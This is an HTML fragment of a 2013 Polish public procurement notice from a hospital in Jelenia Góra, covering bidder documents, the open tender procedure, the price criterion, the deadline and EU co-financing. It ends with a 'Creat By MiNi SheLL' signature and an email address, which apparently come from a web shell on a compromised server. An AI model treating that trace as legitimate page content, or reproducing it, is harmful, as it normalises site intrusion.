<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art.22 ust.1 Ustawy polegać będzie na  zasobach innych podmiotów na zasadach określonych w art.26 ust.2b Ustawy, Zamawiający, w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopnie niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda  zakresu dostępnych Wykonawcy zasobów innego podmiotu,
      charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
                          zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.jgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej lub w wersji papierowej-w ciągu 5dni od daty złożenia wniosku z dołączonym dowodem wpłaty 100 zł na konto Zamawiającego (jak dla wadium),z adnotacją:SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2013 godzina 10:00, miejsce: bezpośrednio _Sekretariat Wojewódzkiego Centrum Szpitalnego Kotliny Jeleniogórskiej, ul. Ogińskiego 6, 58-506 Jelenia Góra, pokój 171 lub za pośrednictwem operatora wyznaczonego na adres jw..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com